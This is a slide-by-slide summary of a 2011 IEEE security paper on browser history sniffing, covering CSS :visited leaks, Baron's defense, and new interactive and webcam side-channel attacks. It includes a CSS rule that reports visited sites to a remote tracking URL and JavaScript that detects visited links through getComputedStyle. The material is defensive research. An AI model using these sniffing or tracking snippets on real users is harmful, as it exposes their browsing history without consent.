Zachary Weinberg, Eric Y. Chen, Pavithra Ramesh Jayaraman, Collin Jackson (Carnegie Mellon University): I Still Know What You Visited Last Summer


  • Slide 1
  • I Still Know What You Visited Last Summer: User interaction and side-channel attacks on browsing history. Zachary Weinberg, Eric Y. Chen, Pavithra Ramesh Jayaraman, Collin Jackson (Carnegie Mellon University). IEEE Symposium on Security and Privacy, May 2011.
  • Slide 2
  • 2
  • Slide 3
  • Outline 3
    Introduction; Automated Attacks; Exp 1: Interactive Attacks; Exp 2: Side-Channel Attacks; Related Work; Conclusion.
  • Slide 4
  • Introduction 4
    History sniffing through CSS :visited. Andrew Clover, 2002, http://seclists.org/bugtraq/2002/Feb/271
    In HTML: a link with id link1 and the text "Visit Google!". In CSS:
        #link1:visited { color: red; background: url(http://140.115.53.28/track.php?url=google.com); }
  • Slide 5
  • Introduction 5
    L. David Baron, 2010, http://dbaron.org/mozilla/visited-privacy
    Make getComputedStyle act as though all links are unvisited.
    Make certain CSS selectors act as though links are always unvisited.
    Limit the CSS properties that can be used to style visited links to color, background-color, border-*-color, outline-color, column-rule-color, fill, and stroke.
    The latest versions of Firefox, Chrome, Safari, and IE all adopt this defense. Still vulnerable to interactive attacks.
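As an added illustration of the third rule (not code from the slides or from Baron's patch), this script applies that property allowlist to flat CSS text and reports which declarations in :visited rules a defended browser would ignore. It assumes flat "selector { prop: value; }" rules with no nesting, no comments and no semicolons inside values; the tracker host in the sample is a placeholder.

```javascript
// Added example, not from the slides or from Baron's patch: apply the :visited property
// allowlist to flat CSS and list what a defended browser would ignore.
// Assumption: flat "selector { prop: value; ... }" rules, no nesting, no comments,
// no ';' inside values.

// Properties a :visited rule may still set under the defense (from the slide).
const VISITED_ALLOWED = new Set([
  "color", "background-color", "outline-color", "column-rule-color", "fill", "stroke",
]);
// "border-*-color" on the slide: the four side-specific border colors.
const BORDER_COLOR_RE = /^border-(top|right|bottom|left)-color$/;

function isAllowedForVisited(prop) {
  const p = prop.trim().toLowerCase();
  return VISITED_ALLOWED.has(p) || BORDER_COLOR_RE.test(p);
}

// Split flat CSS into { selector, declarations: [{ prop, value }] } rules.
function parseRules(css) {
  const rules = [];
  const ruleRe = /([^{}]+)\{([^{}]*)\}/g;
  let m;
  while ((m = ruleRe.exec(css)) !== null) {
    const declarations = m[2].split(";").map(d => d.trim()).filter(Boolean).map(d => {
      const i = d.indexOf(":");  // the first colon separates the property name
      return { prop: d.slice(0, i).trim(), value: d.slice(i + 1).trim() };
    });
    rules.push({ selector: m[1].trim(), declarations });
  }
  return rules;
}

// Declarations inside :visited rules that fall outside the allowlist.
function blockedVisitedDeclarations(css) {
  const blocked = [];
  for (const rule of parseRules(css)) {
    if (!rule.selector.includes(":visited")) continue;
    for (const d of rule.declarations) {
      if (!isAllowedForVisited(d.prop)) blocked.push({ selector: rule.selector, prop: d.prop });
    }
  }
  return blocked;
}

// Constructed sample: a 2002-style rule as on the earlier slide (tracker host is a
// placeholder) plus a rule mixing an allowed and a disallowed property.
const SAMPLE_CSS = `
a { color: blue; }
#link1:visited { color: red; background: url(http://tracker.example/track.php?url=google.com); }
a:visited { font-size: 200%; border-left-color: green; }
`;
console.log(blockedVisitedDeclarations(SAMPLE_CSS));  // background and font-size are reported
```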
  • Slide 6
  • Introduction 6
    Dongseok Jang et al., An Empirical Study of Privacy-Violating Information Flows in JavaScript Web Applications.
    Small sets of links (6 to 220) probed by real exploiters; 46 popular websites, including one from the Alexa Top 100.
    This makes interactive attacks possible.
  • Slide 7
  • Introduction 7
    What can history sniffers do?
    Benign: websites could use history sniffing to determine whether their users have visited known phishing sites. Websites could seed visitors' history with URLs made up for the purpose and use those URLs to re-identify their visitors (compare cookies).
    Malicious: track visitors across sites for advertising purposes, determining whether they also visit a site's competitors. Attackers can construct more targeted phishing pages by impersonating only sites that a particular victim is known to visit.
  • Slide 8
  • Automated Attacks 8
    Direct sniffing (getComputedStyle reports the visited color; blocked by Baron's defense, which reports the unvisited style):
        a:visited { color: red; }

        var url_array = new Array('http://a.com', 'http://b.com');
        var visited_array = new Array();
        var link_el = document.createElement('a');
        var computed_style = document.defaultView.getComputedStyle(link_el, "");
        for (var i = 0; i < url_array.length; i++) {
          link_el.href = url_array[i];  // the slide's "array[i]" was a typo for url_array
          if (computed_style.getPropertyValue("color") == 'rgb(255, 0, 0)') {
            visited_array.push(url_array[i]);
          }
        }
  • Slide 9
  • Automated Attacks 9
    Indirect sniffing: make visited and unvisited links take different amounts of space, which causes unrelated elements on the page to move; inspect the positions of those other elements. Or make visited and unvisited links cause different images to load (a background-image style used in the :visited rule); this variant does not require JavaScript.
  • Slide 10
  • Automated Attacks 10
    Side-channel sniffing: timing attacks. The attacker can make the page take longer to lay out if a link is visited than if it is unvisited, e.g. with a transparent underline or any other style rule in :visited.
    Defense: Baron's solution does well against all three types above (direct, indirect, side-channel).
  • Slide 11
  • Exp 1: Interactive Attacks 11
    Require victims to interact with malicious sites. The authors claim that interactive attacks can be disguised as normal interactive tasks that users will not find surprising or suspicious.
    Amazon's Mechanical Turk: 307 participants recruited. All tasks in this experiment operate within the constraints of Baron's defense: visited-link styles only change the color on the screen.
    The tasks pretend to be CAPTCHA tests (CAPTCHA: Completely Automated Public Turing test to tell Computers and Humans Apart).
  • Slide 12
  • Exp 1: Interactive Attacks 12
    1. Word CAPTCHA: each word is a hyperlink to a URL that the attacker wishes to probe. If unvisited, it is drawn in the same color as the background.
  • Slide 13
  • Exp 1: Interactive Attacks 13
    2. Character CAPTCHA: seven-segment LCD symbols; every letter represents 3 URLs; site-supplied font.
  • Slide 14
  • Exp 1: Interactive Attacks 14
    4 + 5 = 9; 4 + F = A; 5 + F = 6; 4 + 5 + F = 8 is always-on
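An added check (not from the slides or the paper) of the seven-segment sums on this slide and the "3 URLs per letter" claim on the previous one. It assumes the usual segment names a to g and that each of a letter's three probed URLs is tied to one of the overlays 4, 5 and F, and it verifies that every non-empty combination of lit overlays reads as a different glyph.

```javascript
// Added example: verifies the seven-segment sums from the slide. Not code from the paper.
// Segment names (assumed standard): a top, b top-right, c bottom-right, d bottom,
// e bottom-left, f top-left, g middle. A glyph is the set of segments it lights.
const GLYPHS = {
  "4": "bcfg", "5": "acdfg", "F": "aefg",
  "6": "acdefg", "8": "abcdefg", "9": "abcdfg", "A": "abcefg",
};

// Union of the lit segments of several glyphs, as a sorted string.
function unionSegments(names) {
  const lit = new Set();
  for (const n of names) for (const s of GLYPHS[n]) lit.add(s);
  return [...lit].sort().join("");
}

// Name of the glyph whose segment set equals `segments`, or null if none does.
function glyphFor(segments) {
  for (const [name, segs] of Object.entries(GLYPHS)) {
    if (segs === segments) return name;
  }
  return null;
}

// One CAPTCHA letter stands for three probed URLs; each URL is tied to one of the
// overlays 4, 5, F (assumption), and only the overlays of visited URLs are drawn in
// the visible color. Returns the character the user would read.
function displayedGlyph(visitedOverlays) {
  return glyphFor(unionSegments(visitedOverlays));
}

// Enumerate all eight visited/unvisited subsets of {4, 5, F} and the glyph each shows.
function decodingTable() {
  const overlays = ["4", "5", "F"];
  const table = {};
  for (let mask = 0; mask < 8; mask++) {
    const subset = overlays.filter((_, i) => mask & (1 << i));
    table[subset.join("+") || "none"] = displayedGlyph(subset);
  }
  return table;
}

// True when every non-empty subset shows a different glyph, i.e. the character the
// user types identifies exactly which of the three URLs were visited.
function isUniquelyDecodable() {
  const glyphs = Object.entries(decodingTable())
    .filter(([k]) => k !== "none").map(([, g]) => g);
  return glyphs.every(g => g !== null) && new Set(glyphs).size === glyphs.length;
}
```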
  • Slide 15
  • Exp 1: Interactive Attacks 15
    3. Chessboard puzzle: each square contains a URL; only the pawns corresponding to visited sites are made visible. SVG or text is used to control the pawns.
  • Slide 16
  • Exp 1: Interactive Attacks 16
    4. Pattern matching puzzle.
  • Slide 17
  • Exp 1: Interactive Attacks 17
    Randomly generated task instances corresponding to known proportions of visited and unvisited links.
  • Slide 18
  • Exp 1: Interactive Attacks 18
    Automated history-sniffing exploits run on all the participants. URL set from wtikay.com: 7012 commonly visited URLs (from the Alexa Top 5000).
  • Slide 19
  • Exp 1: Interactive Attacks 19
  • Slide 20
  • Exp 1: Interactive Attacks 20
  • Slide 21
  • Exp 1: Interactive Attacks 21
  • Slide 22
  • Exp 1: Interactive Attacks 22
  • Slide 23
  • Exp 1: Interactive Attacks 23
  • Slide 24
  • Exp 2: Side-channel Attacks 24
    Webcam attacks: 20 random URLs, 10 of them visited.
    Variant 1: designed to comply with the WCAG standard for seizure safety.
    Variant 2: make the entire browser window flash, with brighter colors.
  • Slide 25
  • Exp 2: Side-channel Attacks 25
    Author test: 100% accuracy for both variants in every condition tested with a well-lit room and the person staying still in front of the computer. In a dark room, accuracy dropped to 50%.
    Field test: 60 of 307 participants.
  • Slide 26
  • Exp 2: Side-channel Attacks 26
    Field test.
  • Slide 27
  • Exp 2: Side-channel Attacks 27
    In real life: the ChatRoulette service. The attack works even when the closest reflector is a wall 10 to 20 feet away from the monitor.
  • Slide 28
  • Related Work 28
    Page cache: Felten et al., Timing Attacks on Web Privacy. DNS cache: Felten et al., Timing Attacks on Web Privacy. Both tactics above work only the first time and only reveal short-term history.
    Resources loadable cross-origin but only available to logged-in users (Facebook, Gmail, Twitter, etc.), probed through the JavaScript onerror event.
  • Slide 29
  • Related Work 29
    Cookies, Flash Player local shared objects. Ad blockers, private browsing mode.
  • Slide 30
  • Conclusion 30
    Automated history sniffing attacks have been successfully blocked by Baron's solution; interactive attacks have not.
    This paper developed proof-of-concept exploits for 6 history sniffing attacks that work against Baron's defense: 4 interactive attacks and 2 that detect the screen through a webcam.